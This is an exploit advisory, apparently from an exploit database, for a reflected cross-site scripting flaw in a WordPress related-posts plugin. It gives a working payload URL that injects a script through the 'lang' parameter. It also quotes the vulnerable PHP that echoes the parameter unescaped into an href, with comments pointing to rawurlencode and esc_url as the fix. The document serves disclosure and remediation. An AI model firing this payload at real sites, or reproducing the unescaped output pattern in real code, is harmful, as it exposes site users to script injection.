## https://sploitus.com/exploit?id=WPEX-ID:7593D5C8-CBC2-4469-B36B-5D4FB6D49718
/wp-admin/post.php?post=1&action=edit&lang='><script>alert(/XSS/)</script>

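Root cause: classes/meta-boxes/class-meta-box-manage.php:69. The `lang` query parameter is appended to a URL that is then echoed into a single-quoted `href` attribute without any encoding or escaping (reflected XSS).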

// Source of the reflected XSS: the request's `lang` query parameter is appended
// to $url exactly as received, with no validation, URL-encoding or escaping.
// (Where $url is first built is not shown in this excerpt.)
if ( isset( $_GET['lang'] ) ) {
  $url .= "&amp;lang=" . $_GET['lang'];
}

echo "<span id='view-post-btn'>";
// Sink: $url is written into a single-quoted href attribute with no output
// escaping, so a quote character in `lang` ends the attribute and the rest of
// the value is parsed by the browser as markup.
// NOTE(review): the remediation is to encode the parameter when it is added to
// the query string (e.g. rawurlencode()) and to escape the complete URL at this
// output point with esc_url(); confirm against the plugin's patched release.
echo "<a href='" . $url . "' class='button button-primary'>";
// Static, translatable link label; it does not depend on request data.
_e( 'Add Related Posts', 'related-posts-for-wp' );